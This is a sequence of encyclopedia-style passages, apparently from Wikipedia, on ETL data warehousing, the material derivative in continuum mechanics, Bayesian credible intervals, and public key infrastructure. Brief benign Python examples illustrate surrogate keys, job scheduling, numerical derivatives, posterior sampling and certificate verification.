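A minimal sketch of surrogate-key assignment with a lookup keyed by (source system, source key); all names are illustrative. Each distinct source entity receives one warehouse surrogate key, no matter which native key its source system uses.

```python
# Lookup table: (source_system, source_key) -> warehouse surrogate key
lookup = {}
next_sk = 1

def surrogate_key(source_system, source_key):
    """Assign a stable warehouse surrogate key for each source entity."""
    global next_sk
    k = (source_system, source_key)
    if k not in lookup:
        lookup[k] = next_sk
        next_sk += 1
    return lookup[k]

# The same kind of entity arrives from systems with different native keys
a = surrogate_key("payroll", "123-45-6789")   # SSN-keyed source
b = surrogate_key("crm", "+1-555-0100")       # phone-keyed source
print(a, b, surrogate_key("payroll", "123-45-6789"))  # → 1 2 1
```

In a real warehouse the lookup lives in a table rather than a dictionary, and an extra consolidation step decides when keys from different systems refer to the same customer.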
Usually, updates occur to a dimension's source data, which obviously must be reflected in the data warehouse.
If the primary key of the source data is required for reporting, the dimension already contains that piece of information for each row. If the source data uses a surrogate key, the warehouse must keep track of it even though it is never used in queries or reports; this is done by creating a lookup table that contains the warehouse surrogate key and the originating key.[7] This way, the dimension is not polluted with surrogates from the various source systems, while the ability to update is preserved.
The lookup table is used in different ways depending on the nature of the source data.
There are five types to consider;[7] three are included here:
ETL vendors benchmark their record systems at multiple terabytes per hour (roughly 1 GB per second) using powerful servers with multiple CPUs, multiple hard drives, multiple gigabit-network connections, and plenty of memory.
In real life, the slowest part of an ETL process usually occurs in the database load phase. Databases may perform slowly because they have to take care of concurrency, integrity maintenance, and indices. Thus, for better performance, it may make sense to employ:
Still, even using bulk operations, database access is usually the bottleneck in the ETL process. Some common methods used to increase performance are:
Whether to do certain operations in the database or outside may involve a trade-off. For example, removing duplicates using distinct may be slow in the database; thus, it makes sense to do it outside. On the other hand, if using distinct significantly (say, a hundredfold) decreases the number of rows to be extracted, then it makes sense to remove duplicates as early as possible, in the database, before unloading the data.
A common source of problems in ETL is a large number of dependencies among ETL jobs. For example, job "B" cannot start while job "A" is not finished. Better performance can usually be achieved by visualizing all processes on a graph, trying to reduce the graph while making maximum use of parallelism, and making "chains" of consecutive processing as short as possible. Again, partitioning of big tables and their indices can really help.
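One way to stage such a dependency graph is a topological sort that groups together all jobs whose prerequisites have finished, so each group can run in parallel. The job names are illustrative; `graphlib` requires Python 3.9+.

```python
from graphlib import TopologicalSorter

# Job dependency graph: job -> set of jobs it must wait for (illustrative)
deps = {"B": {"A"}, "C": {"A"}, "D": {"B", "C"}}

ts = TopologicalSorter(deps)
ts.prepare()
stages = []
while ts.is_active():
    ready = list(ts.get_ready())   # jobs whose prerequisites are all done
    stages.append(sorted(ready))   # these can run in parallel
    ts.done(*ready)
print(stages)  # → [['A'], ['B', 'C'], ['D']]
```

Shortening the longest chain in the graph (here A → B → D) is what shortens the overall wall-clock time of the ETL run.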
Another common issue occurs when the data are spread among several databases, and processing is done in those databases sequentially. Sometimes database replication may be involved as a method of copying data between databases – it can significantly slow down the whole process. The common solution is to reduce the processing graph to only three layers:
This approach allows processing to take maximum advantage of parallelism. For example, if you need to load data into two databases, you can run the loads in parallel (instead of loading into the first – and then replicating into the second).
Sometimes processing must take place sequentially. For example, dimensional (reference) data are needed before one can get and validate the rows for the main "fact" tables.
Some ETL software implementations include parallel processing. This enables a number of methods to improve overall performance of ETL when dealing with large volumes of data.
ETL applications implement three main types of parallelism:
All three types of parallelism usually operate combined in a single job or task.
An additional difficulty comes with making sure that the data being uploaded is relatively consistent. Because multiple source databases may have different update cycles (some may be updated every few minutes, while others may take days or weeks), an ETL system may be required to hold back certain data until all sources are synchronized. Likewise, where a warehouse may have to be reconciled to the contents in a source system or with the general ledger, establishing synchronization and reconciliation points becomes necessary.
Data warehousing procedures usually subdivide a big ETL process into smaller pieces running sequentially or in parallel. To keep track of data flows, it makes sense to tag each data row with a "row_id" and each piece of the process with a "run_id". In case of a failure, these IDs help to roll back and rerun the failed piece.
Best practice also calls for checkpoints, which are states at which certain phases of the process are complete. Once at a checkpoint, it is a good idea to write everything to disk, clean out temporary files, log the state, and so on.
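The row_id/run_id tagging and checkpointing idea can be sketched as follows; the piece/run structure is simplified for illustration, with the set of completed run IDs standing in for persisted checkpoint state.

```python
import uuid

def run_piece(rows, run_id, completed):
    """Process one piece of a larger ETL run; skip pieces already done."""
    if run_id in completed:          # checkpoint says this piece finished
        return []
    out = [{"row_id": uuid.uuid4().hex, "run_id": run_id, **r} for r in rows]
    completed.add(run_id)            # record the checkpoint
    return out

completed = set()
first = run_piece([{"v": 1}, {"v": 2}], "run-001", completed)
rerun = run_piece([{"v": 1}, {"v": 2}], "run-001", completed)  # no-op on rerun
print(len(first), len(rerun))  # → 2 0
```

After a failure, rows can be deleted by run_id to roll back, and the run restarted from the last recorded checkpoint instead of from scratch.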
An established ETL framework may improve connectivity and scalability.[citation needed] A good ETL tool must be able to communicate with the many different relational databases and read the various file formats used throughout an organization. ETL tools have started to migrate into enterprise application integration, or even enterprise service bus, systems that now cover much more than just the extraction, transformation, and loading of data. Many ETL vendors now have data profiling, data quality, and metadata capabilities. A common use case for ETL tools is converting CSV files to formats readable by relational databases. A typical translation of millions of records is facilitated by ETL tools that enable users to input CSV-like data feeds/files and import them into a database with as little code as possible.
ETL tools are typically used by a broad range of professionals, from computer science students looking to quickly import large data sets to database architects in charge of company account management; they have become a convenient tool that can be relied on for maximum performance. ETL tools in most cases contain a GUI that helps users conveniently transform data using a visual data mapper, as opposed to writing large programs to parse files and modify data types.
While ETL tools have traditionally been for developers and IT staff, research firm Gartner wrote that the new trend is to provide these capabilities to business users so they can themselves create connections and data integrations when needed, rather than going to the IT staff.[8]Gartner refers to these non-technical users as Citizen Integrators.[9]
In online transaction processing (OLTP) applications, changes from individual OLTP instances are detected and logged into a snapshot, or batch, of updates. An ETL instance can be used to periodically collect all of these batches, transform them into a common format, and load them into a data lake or warehouse.[1]
Data virtualization can be used to advance ETL processing. The application of data virtualization to ETL allows solving the most common ETL tasks of data migration and application integration for multiple dispersed data sources. Virtual ETL operates with an abstracted representation of the objects or entities gathered from a variety of relational, semi-structured, and unstructured data sources. ETL tools can leverage object-oriented modeling and work with entities' representations persistently stored in a centrally located hub-and-spoke architecture. Such a collection, containing representations of the entities or objects gathered from the data sources for ETL processing, is called a metadata repository; it can reside in memory or be made persistent. By using a persistent metadata repository, ETL tools can transition from one-time projects to persistent middleware, performing data harmonization and data profiling consistently and in near-real time.
Extract, load, transform(ELT) is a variant of ETL in which the extracted data is loaded into the target system first.[10] The architecture for the analytics pipeline should also consider where to cleanse and enrich data[10] as well as how to conform dimensions.[1] Some of the benefits of an ELT process include speed and the ability to more easily handle both unstructured and structured data.[11]
Ralph Kimball and Joe Caserta's book The Data Warehouse ETL Toolkit (Wiley, 2004), which is used as a textbook for courses teaching ETL processes in data warehousing, addressed this issue.[12]
Cloud-based data warehouses like Amazon Redshift, Google BigQuery, Microsoft Azure Synapse Analytics, and Snowflake have been able to provide highly scalable computing power. This lets businesses forgo preload transformations and replicate raw data into their data warehouses, where it can be transformed as needed using SQL.
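A toy version of the in-database transformation that ELT relies on, using SQLite in place of a cloud warehouse; the raw payload format is invented. Raw data is loaded untouched, and SQL does the transformation afterwards.

```python
import sqlite3

db = sqlite3.connect(":memory:")

# Extract + Load: raw data is replicated as-is into the warehouse
db.execute("CREATE TABLE raw_events (payload TEXT)")
db.executemany("INSERT INTO raw_events VALUES (?)",
               [("alice|10",), ("bob|20",)])

# Transform: done afterwards, inside the warehouse, with SQL
db.execute("""
    CREATE TABLE events AS
    SELECT substr(payload, 1, instr(payload, '|') - 1)                   AS name,
           CAST(substr(payload, instr(payload, '|') + 1) AS INTEGER)     AS amount
    FROM raw_events
""")
print(db.execute("SELECT name, amount FROM events").fetchall())
# → [('alice', 10), ('bob', 20)]
```

Keeping the raw table around is the point: transformations can be rewritten and re-run later without re-extracting from the source systems.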
After having used ELT, data may be processed further and stored in a data mart.[13]
Most data integration tools skew towards ETL, while ELT is popular in database and data-warehouse appliances. Similarly, it is possible to perform TEL (transform, extract, load), where data is first transformed on a blockchain (as a way of recording changes to data, e.g., token burning) before being extracted and loaded into another data store.[14]
|
https://en.wikipedia.org/wiki/Extract,_transform,_load
|
In continuum mechanics, the material derivative[1][2] describes the time rate of change of some physical quantity (like heat or momentum) of a material element that is subjected to a space-and-time-dependent macroscopic velocity field. The material derivative can serve as a link between the Eulerian and Lagrangian descriptions of continuum deformation.[3]
For example, in fluid dynamics, the velocity field is the flow velocity, and the quantity of interest might be the temperature of the fluid. In this case, the material derivative describes the temperature change of a certain fluid parcel with time, as it flows along its pathline (trajectory).
There are many other names for the material derivative, including:
The material derivative is defined for any tensor field y that is macroscopic, in the sense that it depends only on position and time coordinates, y = y(x, t):DyDt≡∂y∂t+u⋅∇y,{\displaystyle {\frac {\mathrm {D} y}{\mathrm {D} t}}\equiv {\frac {\partial y}{\partial t}}+\mathbf {u} \cdot \nabla y,}where ∇y is the covariant derivative of the tensor, and u(x, t) is the flow velocity. Generally the convective derivative of the field, u·∇y, the term that contains the covariant derivative of the field, can be interpreted either as the streamline tensor derivative of the field, u·(∇y), or as the streamline directional derivative of the field, (u·∇)y, both leading to the same result.[10] Only this spatial term containing the flow velocity describes the transport of the field in the flow, while the other term describes the intrinsic variation of the field, independent of the presence of any flow. Confusingly, the name "convective derivative" is sometimes used for the whole material derivative D/Dt, rather than for only the spatial term u·∇.[2] The effect of the time-independent term in the definitions is, for the scalar and tensor case respectively, known as advection and convection.
For example, for a macroscopic scalar field φ(x, t) and a macroscopic vector field A(x, t), the definition becomes:DφDt≡∂φ∂t+u⋅∇φ,DADt≡∂A∂t+u⋅∇A.{\displaystyle {\begin{aligned}{\frac {\mathrm {D} \varphi }{\mathrm {D} t}}&\equiv {\frac {\partial \varphi }{\partial t}}+\mathbf {u} \cdot \nabla \varphi ,\\[3pt]{\frac {\mathrm {D} \mathbf {A} }{\mathrm {D} t}}&\equiv {\frac {\partial \mathbf {A} }{\partial t}}+\mathbf {u} \cdot \nabla \mathbf {A} .\end{aligned}}}
In the scalar case, ∇φ is simply the gradient of a scalar, while ∇A is the covariant derivative of the macroscopic vector (which can also be thought of as the Jacobian matrix of A as a function of x).
In particular, for a scalar field in a three-dimensional Cartesian coordinate system (x1, x2, x3), the components of the velocity u are u1, u2, u3, and the convective term is then:u⋅∇φ=u1∂φ∂x1+u2∂φ∂x2+u3∂φ∂x3.{\displaystyle \mathbf {u} \cdot \nabla \varphi =u_{1}{\frac {\partial \varphi }{\partial x_{1}}}+u_{2}{\frac {\partial \varphi }{\partial x_{2}}}+u_{3}{\frac {\partial \varphi }{\partial x_{3}}}.}
Consider a scalar quantity φ = φ(x, t), where t is time and x is position. Here φ may be some physical variable such as temperature or chemical concentration. The physical quantity whose scalar value is φ exists in a continuum whose macroscopic velocity is represented by the vector field u(x, t).
The (total) derivative with respect to time ofφis expanded using the multivariatechain rule:ddtφ(x(t),t)=∂φ∂t+x˙⋅∇φ.{\displaystyle {\frac {\mathrm {d} }{\mathrm {d} t}}\varphi (\mathbf {x} (t),t)={\frac {\partial \varphi }{\partial t}}+{\dot {\mathbf {x} }}\cdot \nabla \varphi .}
It is apparent that this derivative depends on the vector x˙≡dxdt,{\displaystyle {\dot {\mathbf {x} }}\equiv {\frac {\mathrm {d} \mathbf {x} }{\mathrm {d} t}},} which describes a chosen path x(t) in space. For example, if x˙=0{\displaystyle {\dot {\mathbf {x} }}=\mathbf {0} } is chosen, the time derivative becomes equal to the partial time derivative, which agrees with the definition of a partial derivative: a derivative taken with respect to some variable (time, in this case) holding other variables constant (space, in this case). This makes sense because if x˙=0{\displaystyle {\dot {\mathbf {x} }}=0}, then the derivative is taken at some constant position. This static-position derivative is called the Eulerian derivative.
An example of this case is a swimmer standing still and sensing temperature change in a lake early in the morning: the water gradually becomes warmer due to heating from the sun. In this case, the term ∂φ/∂t{\displaystyle {\partial \varphi }/{\partial t}} is sufficient to describe the rate of change of temperature.
If the sun is not warming the water (i.e. ∂φ/∂t=0{\displaystyle {\partial \varphi }/{\partial t}=0}), but the path x(t) is not a standstill, the time derivative of φ may still change due to the path. For example, imagine the swimmer is in a motionless pool of water, indoors and unaffected by the sun, where one end happens to be at a constant high temperature and the other end at a constant low temperature. By swimming from one end to the other, the swimmer senses a change of temperature with respect to time, even though the temperature at any given (static) point is a constant. This is because the derivative is taken at the swimmer's changing location, and the second term on the right, x˙⋅∇φ{\displaystyle {\dot {\mathbf {x} }}\cdot \nabla \varphi }, is sufficient to describe the rate of change of temperature. A temperature sensor attached to the swimmer would show temperature varying with time, simply due to the temperature variation from one end of the pool to the other.
The material derivative is finally obtained when the path x(t) is chosen to have a velocity equal to the fluid velocity:x˙=u.{\displaystyle {\dot {\mathbf {x} }}=\mathbf {u} .}
That is, the path follows the fluid current described by the fluid's velocity field u. So, the material derivative of the scalar φ isDφDt=∂φ∂t+u⋅∇φ.{\displaystyle {\frac {\mathrm {D} \varphi }{\mathrm {D} t}}={\frac {\partial \varphi }{\partial t}}+\mathbf {u} \cdot \nabla \varphi .}
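The equivalence between the Eulerian formula above and differentiation along a pathline can be checked numerically; the scalar field, velocity field, and pathline below are chosen only for illustration (the pathline (cos t, −sin t) satisfies ẋ = u for the rotating field u = (y, −x)).

```python
import math

# Illustrative scalar field phi(x, y, t) and steady velocity field u = (y, -x)
def phi(x, y, t):
    return math.sin(x) * math.exp(-t) + y * y

def u(x, y):
    return (y, -x)                      # rigid rotation about the origin

# Eulerian evaluation of D(phi)/Dt = d(phi)/dt + u . grad(phi)
def material_derivative(x, y, t, h=1e-6):
    dphi_dt = (phi(x, y, t + h) - phi(x, y, t - h)) / (2 * h)
    dphi_dx = (phi(x + h, y, t) - phi(x - h, y, t)) / (2 * h)
    dphi_dy = (phi(x, y + h, t) - phi(x, y - h, t)) / (2 * h)
    ux, uy = u(x, y)
    return dphi_dt + ux * dphi_dx + uy * dphi_dy

# Lagrangian check: the pathline (x, y) = (cos t, -sin t) satisfies xdot = u,
# so differentiating phi along it must give the same number.
def phi_along_path(t):
    return phi(math.cos(t), -math.sin(t), t)

t0, h = 0.7, 1e-6
along = (phi_along_path(t0 + h) - phi_along_path(t0 - h)) / (2 * h)
eulerian = material_derivative(math.cos(t0), -math.sin(t0), t0)
print(abs(along - eulerian) < 1e-5)  # → True
```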
An example of this case is a lightweight, neutrally buoyant particle swept along a flowing river, experiencing temperature changes as it does so. The temperature of the water locally may be increasing because one portion of the river is sunny and another is in shadow, or the water as a whole may be heating as the day progresses. The change due to the particle's motion (itself caused by fluid motion) is called advection (or convection if a vector is being transported).
The definition above relied on the physical nature of a fluid current; however, no laws of physics were invoked (for example, it was assumed that a lightweight particle in a river will follow the velocity of the water). It turns out that many physical concepts can be described concisely using the material derivative. The general case of advection, however, relies on conservation of mass of the fluid stream; the situation becomes slightly different if advection happens in a non-conservative medium.
Only a path was considered for the scalar above. For a vector, the gradient becomes a tensor derivative; for tensor fields we may want to take into account not only translation of the coordinate system due to the fluid movement, but also its rotation and stretching. This is achieved by the upper-convected time derivative.
It may be shown that, in orthogonal coordinates, the j-th component of the convection term of the material derivative of a vector field A{\displaystyle \mathbf {A} } is given by[11][(u⋅∇)A]j=∑iuihi∂Aj∂qi+Aihihj(uj∂hj∂qi−ui∂hi∂qj),{\displaystyle [\left(\mathbf {u} \cdot \nabla \right)\mathbf {A} ]_{j}=\sum _{i}{\frac {u_{i}}{h_{i}}}{\frac {\partial A_{j}}{\partial q^{i}}}+{\frac {A_{i}}{h_{i}h_{j}}}\left(u_{j}{\frac {\partial h_{j}}{\partial q^{i}}}-u_{i}{\frac {\partial h_{i}}{\partial q^{j}}}\right),}
where the hi are related to the metric tensors by hi=gii.{\displaystyle h_{i}={\sqrt {g_{ii}}}.}
In the special case of a three-dimensional Cartesian coordinate system (x, y, z), with A being a 1-tensor (a vector with three components), this is just:(u⋅∇)A=(ux∂Ax∂x+uy∂Ax∂y+uz∂Ax∂zux∂Ay∂x+uy∂Ay∂y+uz∂Ay∂zux∂Az∂x+uy∂Az∂y+uz∂Az∂z)=∂(Ax,Ay,Az)∂(x,y,z)u{\displaystyle (\mathbf {u} \cdot \nabla )\mathbf {A} ={\begin{pmatrix}\displaystyle u_{x}{\frac {\partial A_{x}}{\partial x}}+u_{y}{\frac {\partial A_{x}}{\partial y}}+u_{z}{\frac {\partial A_{x}}{\partial z}}\\\displaystyle u_{x}{\frac {\partial A_{y}}{\partial x}}+u_{y}{\frac {\partial A_{y}}{\partial y}}+u_{z}{\frac {\partial A_{y}}{\partial z}}\\\displaystyle u_{x}{\frac {\partial A_{z}}{\partial x}}+u_{y}{\frac {\partial A_{z}}{\partial y}}+u_{z}{\frac {\partial A_{z}}{\partial z}}\end{pmatrix}}={\frac {\partial (A_{x},A_{y},A_{z})}{\partial (x,y,z)}}\mathbf {u} }
where ∂(Ax,Ay,Az)∂(x,y,z){\displaystyle {\frac {\partial (A_{x},A_{y},A_{z})}{\partial (x,y,z)}}} is a Jacobian matrix.
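The agreement between the component form and the Jacobian-matrix form can be spot-checked numerically; the vector field A = (xy, yz, zx), the constant velocity u, and the evaluation point are all illustrative.

```python
# Illustrative vector field A(x, y, z) = (xy, yz, zx)
def A(x, y, z):
    return [x * y, y * z, z * x]

u = [1.0, 2.0, 3.0]      # constant velocity, for simplicity
p = [0.4, -1.2, 2.0]     # evaluation point
h = 1e-6

# Central-difference partial derivative dA_j / dx_i at p
def partial(j, i):
    fwd = [p[k] + h * (k == i) for k in range(3)]
    bwd = [p[k] - h * (k == i) for k in range(3)]
    return (A(*fwd)[j] - A(*bwd)[j]) / (2 * h)

# Matrix form of the convective term: (u . grad) A = Jacobian(A) u
matrix_form = [sum(partial(j, i) * u[i] for i in range(3)) for j in range(3)]

# Component form, worked out by hand for this particular A:
hand = [u[0] * p[1] + u[1] * p[0],   # u . grad(xy)
        u[1] * p[2] + u[2] * p[1],   # u . grad(yz)
        u[0] * p[2] + u[2] * p[0]]   # u . grad(zx)

print(all(abs(m - a) < 1e-6 for m, a in zip(matrix_form, hand)))  # → True
```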
There is also a vector-dot-del identity with which the material derivative of a vector field A{\displaystyle \mathbf {A} } can be expressed.
|
https://en.wikipedia.org/wiki/Material_derivative
|
In Bayesian statistics, a credible interval is an interval used to characterize a probability distribution. It is defined such that an unobserved parameter value has a particular probability γ{\displaystyle \gamma } of falling within it. For example, in an experiment that determines the distribution of possible values of the parameter μ{\displaystyle \mu }, if the probability that μ{\displaystyle \mu } lies between 35 and 45 is γ=0.95{\displaystyle \gamma =0.95}, then 35≤μ≤45{\displaystyle 35\leq \mu \leq 45} is a 95% credible interval.
Credible intervals are typically used to characterize posterior probability distributions or predictive probability distributions.[1] Their generalization to disconnected or multivariate sets is called a credible set or credible region.
Credible intervals are a Bayesian analog to confidence intervals in frequentist statistics.[2] The two concepts arise from different philosophies:[3] Bayesian intervals treat their bounds as fixed and the estimated parameter as a random variable, whereas frequentist confidence intervals treat their bounds as random variables and the parameter as a fixed value. Also, Bayesian credible intervals use (and indeed require) knowledge of the situation-specific prior distribution, while frequentist confidence intervals do not.
Credible sets are not unique, as any given probability distribution has an infinite number of γ{\displaystyle \gamma }-credible sets, i.e. sets of probability γ{\displaystyle \gamma }. For example, in the univariate case, there are multiple definitions for a suitable interval or set:
One may also define an interval for which the mean is the central point, assuming that the mean exists.
γ{\displaystyle \gamma }-Smallest Credible Sets (γ{\displaystyle \gamma }-SCS) can easily be generalized to the multivariate case and are bounded by probability-density contour lines.[4] They always contain the mode, but not necessarily the mean, the coordinate-wise median, or the geometric median.
Credible intervals can also be estimated through the use of simulation techniques such as Markov chain Monte Carlo.[5]
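For example, an equal-tailed credible interval can be read off from posterior draws. Here the posterior is a Beta distribution from a toy Bernoulli experiment (7 successes, 3 failures, uniform prior), simulated with the standard library; the numbers are illustrative.

```python
import random

random.seed(0)

# Posterior for a Bernoulli success probability with a uniform prior:
# Beta(1 + 7, 1 + 3) after observing 7 successes and 3 failures.
draws = sorted(random.betavariate(8, 4) for _ in range(100_000))

def equal_tailed(draws, gamma=0.95):
    """Central credible interval: cut (1 - gamma)/2 probability from each tail."""
    lo = draws[int(len(draws) * (1 - gamma) / 2)]
    hi = draws[int(len(draws) * (1 + gamma) / 2)]
    return lo, hi

lo, hi = equal_tailed(draws)
print(round(lo, 2), round(hi, 2))  # roughly (0.39, 0.89) for Beta(8, 4)
```

The same draws could instead be scanned for the narrowest interval containing 95% of them, which would give the smallest credible interval rather than the equal-tailed one.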
A frequentist 95% confidence interval means that, over a large number of repeated samples, 95% of the calculated confidence intervals would include the true value of the parameter. In frequentist terms, the parameter is fixed (it cannot be considered to have a distribution of possible values) and the confidence interval is random (as it depends on the random sample).
Bayesian credible intervals differ from frequentist confidence intervals by two major aspects:
For the case of a single parameter and data that can be summarised in a single sufficient statistic, it can be shown that the credible interval and the confidence interval coincide if the unknown parameter is a location parameter (i.e. the forward probability function has the form Pr(x|μ)=f(x−μ){\displaystyle \mathrm {Pr} (x|\mu )=f(x-\mu )}), with a prior that is a uniform flat distribution;[6] and also if the unknown parameter is a scale parameter (i.e. the forward probability function has the form Pr(x|s)=f(x/s){\displaystyle \mathrm {Pr} (x|s)=f(x/s)}), with a Jeffreys' prior Pr(s|I)∝1/s{\displaystyle \mathrm {Pr} (s|I)\;\propto \;1/s};[6] the latter follows because taking the logarithm of such a scale parameter turns it into a location parameter with a uniform distribution.
But these are distinctly special (albeit important) cases; in general no such equivalence can be made.
|
https://en.wikipedia.org/wiki/Credible_interval
|
A public key infrastructure (PKI) is a set of roles, policies, hardware, software, and procedures needed to create, manage, distribute, use, store, and revoke digital certificates and manage public-key encryption.
The purpose of a PKI is to facilitate the secure electronic transfer of information for a range of network activities such as e-commerce, internet banking, and confidential email. It is required for activities where simple passwords are an inadequate authentication method and more rigorous proof is needed to confirm the identity of the parties involved in the communication and to validate the information being transferred.
In cryptography, a PKI is an arrangement that binds public keys with the respective identities of entities (like people and organizations).[1][2] The binding is established through a process of registration and issuance of certificates at and by a certificate authority (CA). Depending on the assurance level of the binding, this may be carried out by an automated process or under human supervision. When done over a network, this requires using a secure certificate enrollment or certificate management protocol such as CMP.
The PKI role that may be delegated by a CA to assure valid and correct registration is called a registration authority (RA). An RA is responsible for accepting requests for digital certificates and authenticating the entity making the request.[3] The Internet Engineering Task Force's RFC 3647 defines an RA as "An entity that is responsible for one or more of the following functions: the identification and authentication of certificate applicants, the approval or rejection of certificate applications, initiating certificate revocations or suspensions under certain circumstances, processing subscriber requests to revoke or suspend their certificates, and approving or rejecting requests by subscribers to renew or re-key their certificates. RAs, however, do not sign or issue certificates (i.e., an RA is delegated certain tasks on behalf of a CA)."[4] While Microsoft may have referred to a subordinate CA as an RA,[5] this is incorrect according to the X.509 PKI standards. RAs do not have the signing authority of a CA and only manage the vetting and provisioning of certificates. So in the Microsoft PKI case, the RA functionality is provided either by the Microsoft Certificate Services web site or through Active Directory Certificate Services, which enforces Microsoft Enterprise CA and certificate policy through certificate templates and manages certificate enrollment (manual or auto-enrollment). In the case of Microsoft Standalone CAs, the function of an RA does not exist, since all of the procedures controlling the CA are based on the administration and access procedures associated with the system hosting the CA and the CA itself, rather than Active Directory. Most non-Microsoft commercial PKI solutions offer a stand-alone RA component.
An entity must be uniquely identifiable within each CA domain on the basis of information about that entity. A third-party validation authority (VA) can provide this entity information on behalf of the CA.
The X.509 standard defines the most commonly used format for public key certificates.[6]
PKI provides "trust services": in plain terms, trusting the actions or outputs of entities, be they people or computers. Trust service objectives address one or more of the following capabilities: confidentiality, integrity, and authenticity (CIA).
Confidentiality: Assurance that no entity can maliciously or unwittingly view a payload in clear text. Data is encrypted to make it secret, such that even if it is read, it appears as gibberish. Perhaps the most common use of PKI for confidentiality purposes is in the context of Transport Layer Security (TLS). TLS is a capability underpinning the security of data in transit, i.e. during transmission. A classic example of TLS for confidentiality is using a web browser to log on to a service hosted on an internet-based web site by entering a password.
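As a minimal sketch of the TLS settings a client relies on for confidentiality, Python's standard-library `ssl` module can show what a default client context enables (no network connection is made here; the hostname is never contacted):

```python
import ssl

# A default client context enables what TLS-based confidentiality depends
# on: certificate verification against trusted CAs and hostname checking.
ctx = ssl.create_default_context()

print(ctx.verify_mode == ssl.CERT_REQUIRED)  # server cert must validate
print(ctx.check_hostname)                    # cert must match the hostname
```

Only after these checks pass during a real handshake is the session key negotiated that encrypts the payload in transit.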
Integrity: Assurance that if an entity changed (tampered with) transmitted data in the slightest way, it would be obvious that this happened, because the data's integrity would have been compromised. Often it is not of utmost importance to prevent integrity being compromised (tamper proof); however, it is of utmost importance that if integrity is compromised there is clear evidence of it (tamper evident).
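Tamper evidence can be illustrated with a toy example using Python's standard-library `hmac` module. This is a shared-key MAC, not a PKI signature, but the principle is the same: any change to the payload makes the authentication tag stop matching.

```python
import hashlib
import hmac

# Toy tamper-evidence sketch (a MAC, not a certificate-based signature):
# the sender computes a tag over the payload under a shared key.
key = b"shared-secret"
payload = b"amount=100"
tag = hmac.new(key, payload, hashlib.sha256).hexdigest()

# The verifier recomputes the tag; a tampered payload no longer matches.
tampered = b"amount=999"
print(hmac.new(key, payload, hashlib.sha256).hexdigest() == tag)   # True
print(hmac.new(key, tampered, hashlib.sha256).hexdigest() == tag)  # False
```

In a PKI, the same property is obtained with digital signatures, which additionally let anyone holding the signer's certificate verify the tag without a shared secret.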
Authenticity: Assurance that every entity has certainty of what it is connecting to, or can evidence its legitimacy when connecting to a protected service. The former is termed server-side authentication, typically used when authenticating to a web server using a password. The latter is termed client-side authentication, sometimes used when authenticating using a smart card (hosting a digital certificate and private key).
Public-key cryptography is a cryptographic technique that enables entities to securely communicate on an insecure public network, and reliably verify the identity of an entity via digital signatures.[7]
A public key infrastructure (PKI) is a system for the creation, storage, and distribution of digital certificates, which are used to verify that a particular public key belongs to a certain entity. The PKI creates digital certificates that map public keys to entities, securely stores these certificates in a central repository, and revokes them if needed.[8][9][10]
A PKI consists of:[9][11][12]
The primary role of the CA is to digitally sign and publish the public key bound to a given user. This is done using the CA's own private key, so that trust in the user key relies on one's trust in the validity of the CA's key. When the CA is a third party separate from the user and the system, it is called the registration authority (RA), which may or may not be separate from the CA.[13] The key-to-user binding is established, depending on the level of assurance the binding has, by software or under human supervision.
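The CA's role of binding an identity to a key can be sketched with a hypothetical toy issuer. A real CA signs with an asymmetric private key (e.g. RSA or ECDSA); here an HMAC under a CA-held secret stands in for that signature purely so the sketch stays standard-library only, and all names are illustrative.

```python
import hashlib
import hmac

# Stand-in for the CA's private key (a real CA would use an asymmetric key).
CA_SECRET = b"ca-private-key-stand-in"

def issue_certificate(identity: str, public_key: str) -> dict:
    """CA binds identity and key by signing the 'to-be-signed' data."""
    tbs = f"{identity}|{public_key}".encode()
    sig = hmac.new(CA_SECRET, tbs, hashlib.sha256).hexdigest()
    return {"identity": identity, "public_key": public_key, "signature": sig}

def verify_certificate(cert: dict) -> bool:
    """A relying party checks that the binding is intact."""
    tbs = f"{cert['identity']}|{cert['public_key']}".encode()
    expected = hmac.new(CA_SECRET, tbs, hashlib.sha256).hexdigest()
    return hmac.compare_digest(cert["signature"], expected)

cert = issue_certificate("alice@example.com", "PUBKEY-A")
print(verify_certificate(cert))        # True: binding verified
cert["public_key"] = "PUBKEY-EVIL"     # attacker swaps in a different key
print(verify_certificate(cert))        # False: the binding no longer verifies
```

The point of the sketch is the trust structure: anyone who trusts the CA's key can check the identity-to-key binding without trusting the presenter.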
The term trusted third party (TTP) may also be used for certificate authority (CA). Moreover, PKI is itself often used as a synonym for a CA implementation.[14]
A certificate may be revoked before it expires, which signals that it is no longer valid. Without revocation, an attacker would be able to exploit such a compromised or mis-issued certificate until expiry.[15] Hence, revocation is an important part of a public key infrastructure.[16] Revocation is performed by the issuing certificate authority, which produces a cryptographically authenticated statement of revocation.[17]
For distributing revocation information to clients, timeliness of the discovery of revocation (and hence the window for an attacker to exploit a compromised certificate) trades off against resource usage in querying revocation statuses and privacy concerns.[18] If revocation information is unavailable (either due to accident or an attack), clients must decide whether to fail-hard and treat a certificate as if it is revoked (and so degrade availability) or to fail-soft and treat it as unrevoked (and allow attackers to sidestep revocation).[19]
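The fail-hard versus fail-soft choice can be sketched as a small decision function. The revocation set and serial numbers are hypothetical stand-ins for a CRL or OCSP data source:

```python
# Hypothetical revocation data source (stand-in for a CRL/OCSP responder).
REVOKED = {"serial-042"}

def is_acceptable(serial: str, status_available: bool, fail_hard: bool) -> bool:
    """Decide whether to accept a certificate given revocation-check results."""
    if status_available:
        return serial not in REVOKED
    # Status unknown: fail-hard favors security, fail-soft favors availability.
    return not fail_hard

print(is_acceptable("serial-001", status_available=True, fail_hard=True))   # True
print(is_acceptable("serial-042", status_available=True, fail_hard=True))   # False
print(is_acceptable("serial-001", status_available=False, fail_hard=True))  # False
print(is_acceptable("serial-001", status_available=False, fail_hard=False)) # True
```

The last two calls show the trade-off directly: with the same unknown status, a fail-hard client rejects (degrading availability) while a fail-soft client accepts (letting an attacker who can block the status query sidestep revocation).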
Due to the cost of revocation checks and the availability impact of potentially unreliable remote services, web browsers limit the revocation checks they will perform, and will fail-soft where they do.[20] Certificate revocation lists are too bandwidth-costly for routine use, and the Online Certificate Status Protocol presents connection latency and privacy issues. Other schemes have been proposed but have not yet been successfully deployed to enable fail-hard checking.[16]
In this model of trust relationships, a CA is a trusted third party – trusted both by the subject (owner) of the certificate and by the party relying upon the certificate.
